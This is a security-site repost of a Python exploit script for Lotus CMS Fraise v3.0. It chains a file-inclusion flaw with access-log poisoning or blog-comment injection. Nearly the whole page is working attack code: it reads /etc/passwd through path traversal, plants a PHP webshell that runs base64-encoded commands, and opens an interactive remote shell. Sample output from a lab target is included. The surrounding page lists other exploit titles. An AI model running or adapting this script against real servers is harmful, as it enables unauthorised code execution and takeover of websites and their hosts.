首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Lotus CMS Fraise v3.0 LFI - Remote Code Execution Exploit
来源:net-ninja.net 作者:mr_me 发布时间:2011-01-11  

#!/usr/bin/python
# Lotus CMS Fraise v3.0 LFI - Remote Code Execution Exploit
# greetz Tecr0C :0)
#
# Vuln: lines 15-23 in core/lib/router.php
#---------- sof
# //Get page request (if any)
# $page = $this->getInputString("page", "index");
#     
# //Get plugin request (if any)
# $plugin = $this->getInputString("system", "Page");
#      
# //If there is a request for a plugin
# if(file_exists("core/plugs/".$plugin."Starter.php")){
#  //Include Page fetcher
#       include("core/plugs/".$plugin."Starter.php");
# --------- eof
#
# Additionally, the CMS allows an attacker to comment on blog posts which inturn will
# write a file on the remote disk with possibly 'malicious' content inside.
#
# exploit includes:
# - Proxy support
# - Dynamic User-agent generation
# - Apache access log and Lotus blog comment injection routines
# - Custom shell creation and deletion
#
# Environment:
# Apache 2.2.14/PHP 5.3.2
# php.ini -> magic_quotes_gpc = Off
#
# Example:
# [mr_me@pluto lotuscms]$ python luckylotus.py -c -i 1294585604 -p localhost:8080 -t 192.168.56.101 -d /webapps/lotus/lcms/
#
# | -------------------------------------------- |
# | Lotus CMS v3.0 Remote Code Execution Exploit |
# | by mr_me - net-ninja.net ------------------- |
#
# (+) Exploiting target @: 192.168.56.101/webapps/lotus/lcms/
# (+) Testing proxy @ localhost:8080.. proxy is found to be working!
# (+) Testing the file inclusion vulnerability.. file inclusion is working!
# (+) Writing comment.. comment shell written sucessfully
# (+) Writing webshell d8e8fca2dc0f896fd7cb4cb0031ba249.php to the webroot..
# (+) Entering interactive remote console (q for quit)
#
# mr_me@192.168.56.101# id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# mr_me@192.168.56.101# uname -a
# Linux steve-ubuntu 2.6.32-27-generic #49-Ubuntu SMP Wed Dec 1 23:52:12 UTC 2010 i686 GNU/Linux
#
# mr_me@192.168.56.101# q

import sys, urllib, urllib2, socket, re, base64, getpass
from optparse import OptionParser
from random import choice

usage = "./%prog [<options>] -t [target] -d [directory path]"
usage += "\nExample 1: ./%prog -l -p localhost:8080 -t 192.168.56.101 -d /webapps/lotus/lcms/"
usage += "\nExample 2: ./%prog -c -i 1294585604 -p localhost:8080 -t 192.168.56.101 -d /webapps/lotus/lcms/"

parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
                  help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="dirPath",
                  help="Directory path to the CMS")
parser.add_option("-i", type="string", action="store", dest="blogPostId",
                  help="Blog Post ID that will be injected")
parser.add_option("-l", action="store_true", dest="logInject",
                  help="Code execution via apache access log")
parser.add_option("-c", action="store_true", dest="blogComInject",
                  help="Code execution via Blog comments")

(options, args) = parser.parse_args()

def banner():
    print "\n\t| -------------------------------------------- |"
    print "\t| Lotus CMS v3.0 Remote Code Execution Exploit |"
    print "\t| by mr_me - net-ninja.net ------------------- |\n"

if len(sys.argv) < 5:
 banner()
 parser.print_help()
 sys.exit(1)

# variables
exploit = "index.php?system="
dDS = "../" * 10
nB = "%00"
sName = "d8e8fca2dc0f896fd7cb4cb0031ba249"
phpShell = "<?php system(base64_decode($_GET[a]));?>"
cmd = "&a="
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
        "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
        "Microsoft Internet Explorer/4.0b1 (Windows 95)",
        "Opera/8.00 (Windows NT 5.1; U; en)"]
agent = choice(agents)

def getProxy():
    try:
        proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
    except(socket.timeout):
            print "\n(-) Proxy timed out"
            sys.exit(1)
    return proxy_handler
 
def getServerResponse(exploit):
 if options.proxy:
  try:
   opener = urllib2.build_opener(getProxy())
   opener.addheaders = [('User-agent', agent)]
   check = opener.open(exploit).read()
  except urllib2.HTTPError, error:
                        check = error.read()
   pass
 else:
  try:
   req = urllib2.Request(exploit)
                        req.addheaders = [('User-agent',agent)]
   check = urllib2.urlopen(req).read()
  except urllib2.HTTPError, error:
   check = error.read()
                        pass
 return check

def testFileInclusion():
 sys.stdout.write("\n(+) Testing the file inclusion vulnerability.. ")
 sys.stdout.flush()
 testFile = "etc/passwd"
 response = getServerResponse("http://" + options.target + options.dirPath + exploit + dDS + testFile + nB)
 if re.findall("root:x:", response):
  sys.stdout.write("file inclusion is working! \n")
  sys.stdout.flush()
 else:
  sys.stdout.write("file inclusion failed..\n")
  sys.stdout.flush()
  print "(-) Exiting.."
  sys.exit(1)

def writeDirtyLog():
 sys.stdout.write("(+) Poisoning the access log.. ")
 sys.stdout.flush()
        su = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 try:
  su.connect((options.target,80))
        except:
  print "(-) Failed sending the shell to target %s" % options.target

 junk = ("GET /hazStart"+phpShell+"hazEnd HTTP/1.1\r\nHost: "+options.target+"\r\nConnection: close\r\n\r\n")
 su.send(junk)
 su.close()
 sys.stdout.write("log poisoned!\n")
 sys.stdout.flush()

def huntLogFiles():
 foundLogs = []
 logs = ["var/log/httpd/access_log",
  "var/log/httpd/error_log",
  "apache/logs/error.log",
  "apache/logs/access.log",
  "apache/logs/error.log",
  "apache/logs/access.log",
  "apache/logs/error.log",
  "apache/logs/access.log",
  "apache/logs/error.log",
  "apache/logs/access.log",
  "apache/logs/error.log",
  "apache/logs/access.log",
  "logs/error.log",
  "logs/access.log",
  "logs/error.log",
  "logs/access.log",
  "var/log/apache2/access.log",
  "var/log/apache2/error.log",
  "var/log/apache2/access_log",
  "var/log/apache2/error_log",
  "logs/error.log",
  "logs/access.log",
  "logs/error.log",
  "logs/access.log",
  "logs/error.log",
  "logs/access.log",
  "etc/httpd/logs/acces_log",
  "etc/httpd/logs/acces.log",
  "etc/httpd/logs/error_log",
  "etc/httpd/logs/error.log",
  "var/www/logs/access_log",
  "var/www/logs/access.log",
  "usr/local/apache/logs/access_log",
  "usr/local/apache/logs/access.log",
  "var/log/apache/access_log",
  "var/log/apache/access.log",
  "var/log/access_log",
  "var/www/logs/error_log",
  "var/www/logs/error.log",
  "usr/local/apache/logs/error_log",
  "usr/local/apache/logs/error.log",
  "var/log/apache/error_log",
  "var/log/apache/error.log",
  "var/log/access_log",
  "var/log/error_log"] 

 for log in logs:
  response = getServerResponse("http://"+options.target + options.dirPath + exploit + dDS + log + nB)
  if re.search("hazStart", response):
   print ("(+) Log file found @ location: %s" % (log))
   foundLogs.append(log)
 return foundLogs

def writeLogWebShell(logFiles):
 print ("(+) Writing webshell %s.php to the webroot.." % (sName))
 cmd64 = base64.b64encode("echo \"<?php system(base64_decode(\$_GET['p'])); ?>\" > %s.php" % (sName))
 for log in logFiles:
  response = getServerResponse("http://"+options.target + options.dirPath + exploit + dDS + log + nB + cmd + cmd64)

def interactiveAttack():
 print "(+) Entering interactive remote console (q for quit)\n"
 hn = "%s@%s# " % (getpass.getuser(), options.target)
 preBaseCmd = ""
 while preBaseCmd != 'q':
  preBaseCmd = raw_input(hn)
  cmd64 = base64.b64encode(preBaseCmd)
  cmdResp = getServerResponse("http://"+options.target + options.dirPath + sName + ".php?p=" + cmd64)
  print cmdResp
 # suicide
 rmShell = base64.b64encode("rm %s.php" % (sName))
 cmdResp = getServerResponse("http://"+options.target + options.dirPath + sName + ".php?p=" + rmShell)
 
def testProxy():
 sys.stdout.write("(+) Testing proxy @ %s.. " % (options.proxy))
 sys.stdout.flush()
 opener = urllib2.build_opener(getProxy())
 try:
  check = opener.open("http://www.google.com").read()
 except:
  check = 0
  pass
 if check >= 1:
  sys.stdout.write("proxy is found to be working!")
  sys.stdout.flush()
 else:
  print "proxy failed, exiting.."
  sys.exit(1)

def writeDirtyComment():
 sys.stdout.write("(+) Writing comment.. ")
 sys.stdout.flush()
 indexPage = "http://" + options.target + options.dirPath + "index.php"
 if options.proxy:
  try:
   values = {'do' : 'comment', 'id' : options.blogPostId, 'name' : phpShell, 'website' : 'findme', 'message' : 'm'
   , 'system' : 'Blog', 'post' : options.blogPostId }
                        data = urllib.urlencode(values)
   proxyfier = urllib2.build_opener(getProxy())
   proxyfier.addheaders = [('User-agent', agent)]
   check = proxyfier.open(indexPage, data).read()

  except:
                        print "(-) Proxy connection failed"
                        sys.exit(1)
 else:
         try:
   values = {'do' : 'comment', 'id' : options.blogPostId, 'name' : phpShell, 'website' : 'findme', 'message' : 'm'
                        , 'system' : 'Blog', 'post' : options.blogPostId }
   data = urllib.urlencode(values)
   req = urllib2.Request(indexPage, data)
                        req.addheaders = [('User-agent',agent)]
                        check = urllib2.urlopen(req).read()
         except:
   print "(-) Target connection failed, check your address"
   sys.exit(1)
 sys.stdout.write("comment shell written sucessfully\n")
 sys.stdout.flush()

def writeCommentWebShell():
 print ("(+) Writing webshell %s.php to the webroot.." % (sName))
 cmd64 = base64.b64encode("echo \"<?php system(base64_decode(\$_GET['p'])); ?>\" > %s.php" % (sName))
 ws = "http://" + options.target + options.dirPath + exploit + "../../data/modules/Blog/data/comments/"
 ws += options.blogPostId + ".txt" + nB + cmd + cmd64
 response = getServerResponse(ws)

if __name__ == "__main__":
 banner()
 print "(+) Exploiting target @: %s" % (options.target+options.dirPath)
 if options.proxy:
  testProxy()
 testFileInclusion()
 if options.logInject:
  writeDirtyLog()
  dirtyLogs = huntLogFiles()
  if dirtyLogs > 0:
   writeLogWebShell(dirtyLogs)
  else:
   print "(-) No log files found working."
   sys.exit(1)
 elif options.blogComInject:
  if options.blogPostId:
   writeDirtyComment()
   writeCommentWebShell()
  else:
   print "(-) Missing Blog Post ID value. See the example.. exiting.."
   sys.exit(1)
 else:
  print "(-) Arguments not set correctly, see the example.. exiting.."
  sys.exit(1)
 interactiveAttack()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS10-081: Windows Common Contr
·Utimaco Safeware AG (Sophos) -
·LOCAL SOLARIS KERNEL ROOT EXPL
·Utimaco Safeware AG (Sophos) -
·Macro Express Pro 4.2.2.1 MXE
·DriveCrypt <= 5.3 local kernel
·DriveCrypt <= 5.3 local kernel
·Solar FTP Server 2.1 Buffer Ov
·ProFTPD 1.2 - 1.3.0 sreplace B
·KingView 6.5.3 SCADA HMI Heap
·Mono/Moonlight Generic Type Ar
·IrfanView 4.28 Multiple Denial
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved